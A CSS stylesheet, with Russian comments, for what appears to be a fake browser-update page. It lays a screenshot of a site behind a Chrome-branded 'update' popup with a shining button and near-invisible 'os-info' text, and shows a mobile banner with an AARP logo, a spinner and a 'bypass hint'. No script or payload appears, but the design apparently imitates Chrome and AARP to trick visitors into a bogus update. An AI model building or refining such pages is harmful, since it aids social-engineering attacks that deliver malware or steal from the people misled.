html,
body {
  margin: 0;
  padding: 0;
}

body {
  background-image: url("https://raw.githubusercontent.com/adam1124124124/12312412/main/smartsnap_7-20-2025_at_06-39-28.png");
  background-position: 0px 0px;
  background-size: 100% auto;
  background-repeat: no-repeat;
  background-attachment: scroll;
  background-color: #f0f0f0;
  min-height: 9447px; /* Это значение сохраняем как было в оригинале, если оно нужно для десктопа */
  color: white;
  text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.7);
  font-family: sans-serif;
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: flex-start;
  overflow-x: hidden;
  overflow-y: auto; /* Для десктопа оставляем auto для прокрутки */
}

h1 {
  font-size: 3em;
  text-align: center;
  margin-top: 50px;
}

p {
  font-size: 1.2em;
  text-align: center;
  max-width: 800px;
  margin: 20px auto;
}

/* Overlay for desktop popup */
.popup-overlay {
  display: block; /* По умолчанию block, чтобы JS мог его скрывать */
  visibility: hidden;
  opacity: 0;
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background-color: rgba(0, 0, 0, 0);
  z-index: 999;
  transition: background-color 0.5s ease-in-out, opacity 0.5s ease-in-out,
    visibility 0.5s;
}

.popup-overlay.show-overlay {
  visibility: visible;
  opacity: 1;
  background-color: rgba(0, 0, 50, 0.4);
}

/* Desktop popup */
.popup {
  display: flex; /* По умолчанию flex, чтобы JS мог его скрывать */
  visibility: hidden;
  opacity: 0;
  position: fixed;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%) translateY(20px);
  background-color: white;
  padding: 30px;
  border-radius: 22px;
  box-shadow: 0 10px 25px rgba(0, 0, 0, 0.2);
  z-index: 1000;
  width: 90%;
  max-width: 580px;
  text-align: center;
  box-sizing: border-box;
  background-image: linear-gradient(to top, #e6f3fa 0%, white 100%);
  transition: opacity 0.5s ease-in-out, transform 0.5s ease-in-out,
    visibility 0.5s;
  flex-direction: column;
  align-items: center;
}

.popup.show-popup {
  visibility: visible;
  opacity: 1;
  transform: translate(-50%, -50%) translateY(0);
}

.popup-content {
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  width: 100%;
}

.chrome-logo {
  width: 90px;
  height: 90px;
  margin-bottom: 10px;
  transition: transform 0.5s ease-in-out;
}

.chrome-logo.animate {
  animation: rotateClockwise 1s linear forwards;
}

.popup-content h2 {
  font-size: 2.2em;
  color: #202124;
  margin-bottom: 10px;
  margin-top: -10px;
  line-height: 1.2;
  font-weight: normal;
  text-shadow: none;
}

.popup-content p {
  font-size: 1em;
  color: #5f6368;
  margin-top: 0;
  margin-bottom: 10px;
  line-height: 1.5;
  max-width: none;
  padding: 0 10px;
  text-shadow: none;
}

.update-button {
  background-color: #1a73e8;
  color: white;
  border: none;
  padding: 12px 25px;
  border-radius: 22px;
  font-size: 1.7em;
  cursor: pointer;
  margin-top: 0;
  margin-bottom: 2px;
  display: flex;
  align-items: center;
  justify-content: center;
  transition: background-color 0.3s ease;
  background-image: linear-gradient(
    to right,
    rgba(255, 255, 255, 0) 0%,
    rgba(255, 255, 255, 0.3) 35%,
    rgba(255, 255, 255, 0.3) 65%,
    rgba(255, 255, 255, 0) 100%
  );
  background-repeat: no-repeat;
  background-size: 300% 100%;
  animation: shine 1.5s ease-in-out forwards;
  margin: 0 auto 2px auto;
}

.update-button:hover {
  background-color: #155cb8;
}

.update-button i {
  margin-right: 8px;
  font-size: 1.2em;
}

.os-info {
  font-size: 0.2em;
  color: #5f6368;
  margin-top: 0;
  margin-bottom: 15px;
  text-shadow: none;
}

.checkbox-container {
  display: flex;
  align-items: center;
  justify-content: center;
  font-size: 0.8em;
  color: #5f6368;
  max-width: 85%;
  text-align: left;
  text-shadow: none;
  padding-bottom: 20px;
  margin: 0 auto;
}

.checkbox-container input[type="checkbox"] {
  margin-right: 10px;
  flex-shrink: 0;
  margin-top: 2px;
  width: 15px;
  height: 15px;
}

.checkbox-container label a {
  color: #1a73e8;
  text-decoration: none;
  text-shadow: none;
}

.checkbox-container label a:hover {
  text-decoration: underline;
}

.terms-text {
  font-size: 0.7em !important;
  color: #5f6368;
  margin-top: 0px;
  margin-bottom: 0px;
  line-height: 1.3;
  text-shadow: none;
  padding: 0 10px;
}

.terms-text a {
  color: #1a73e8;
  text-decoration: none;
}

.terms-text a:hover {
  text-decoration: underline;
}

.copyright-text {
  font-size: 0.8em !important;
  color: #5f6368;
  margin-top: 0;
  margin-bottom: 0;
  text-shadow: none;
  padding: 0 10px;
}

@keyframes rotateClockwise {
  0% {
    transform: rotate(0deg);
  }
  100% {
    transform: rotate(360deg);
  }
}

@keyframes shine {
  0% {
    background-position: -150% 0;
  }
  100% {
    background-position: 150% 0;
  }
}

/* Скрываем мобильный баннер по умолчанию на десктопе */
#mobile-notification-banner {
  display: none !important; /* Убеждаемся, что он скрыт на десктопе */
}

/* Desktop content display rules, ensure this is the default for >768px */
.popup-content.desktop-content {
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  width: 100%;
}

/* Mobile content is hidden by default */
.popup-content.mobile-content {
  display: none;
}

/* Media query for smaller screens (e.g., tablets in portrait) */
@media (max-width: 600px) {
  .popup {
    padding: 30px;
    width: 95%;
  }
  .popup-content h2 {
    font-size: 1.8em;
  }
  .chrome-logo {
    width: 70px;
    height: 70px;
  }
  .checkbox-container {
    font-size: 0.65em;
  }
}

/* Media query for mobile devices */
@media (max-width: 768px) {
  /* Скрываем десктопный попап и оверлей на мобильных */
  .popup,
  .popup-overlay {
    display: none !important; /* Гарантированно скрываем */
  }

  /* Отображаем мобильный баннер на мобильных */
  #mobile-notification-banner {
    display: flex !important; /* Гарантированно отображаем как flex */
    flex-direction: column;
    align-items: center;
    justify-content: center;
    width: 100%;
    background-color: white;
    padding: 30px 15px;
    box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
    position: sticky; /* Sticky, если это нужно для вашего дизайна */
    top: 0;
    z-index: 990;
    box-sizing: border-box;
  }

  /* Стили для body на мобильных */
  body {
    background-image: none; /* Убираем десктопный фон */
    background-color: #f0f0f0; /* Фоновый цвет для мобильных */
    min-height: 100vh; /* Минимальная высота вьюпорта */
    overflow-y: auto !important; /* CRITICAL FIX: Разрешаем прокрутку на мобильных! */
    justify-content: flex-start; /* Выравниваем контент к началу, чтобы избежать лишнего центрирования */
    color: #333; /* Цвет текста для мобильного контента */
    text-shadow: none; /* Убираем тень текста */
  }

  .aarp-logo-mobile {
    width: 100px;
    height: auto;
    margin-bottom: 15px;
  }
  .mobile-divider {
    width: 80%;
    border: none;
    border-top: 1px solid #ccc;
    margin-top: 20px;
    margin-bottom: 20px;
  }
  .mobile-banner-content {
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    width: 100%;
    text-align: center;
    color: #333;
  }
  .mobile-banner-content h2 {
    font-size: 1.8em;
    color: #202124;
    margin-bottom: 15px;
    text-shadow: none;
    line-height: 1.3;
  }
  .mobile-main-message {
    font-size: 1.3em;
    color: #5f6368;
    margin-top: 0;
    margin-bottom: 15px;
    line-height: 1.6;
    padding: 0 10px;
    text-shadow: none;
  }
  .mobile-hint-text {
    font-size: 0.85em;
    color: #5f6368;
    margin-top: 10px;
    margin-bottom: 20px;
    text-shadow: none;
  }
  .mobile-status-text {
    font-size: 0.95em;
    color: #1a73e8;
    margin-top: 15px;
    margin-bottom: 25px;
    font-weight: normal;
    text-shadow: none;
  }
  .mobile-loading-indicator {
    display: block;
    margin: 0 auto 20px auto;
    width: 40px;
    height: 40px;
    border: 4px solid #f3f3f3;
    border-top: 4px solid #1a73e8;
    border-radius: 50%;
    animation: spin 1s linear infinite;
  }
  @keyframes spin {
    0% {
      transform: rotate(0deg);
    }
    100% {
      transform: rotate(360deg);
    }
  }
  .mobile-ref-id {
    font-size: 0.7em;
    color: #888;
    margin-top: 20px;
    margin-bottom: 10px;
    text-shadow: none;
  }
  .mobile-bypass-hint {
    font-size: 0.7em;
    color: #5f6368;
    margin-top: 5px;
    padding: 0 10px;
    text-shadow: none;
  }
}
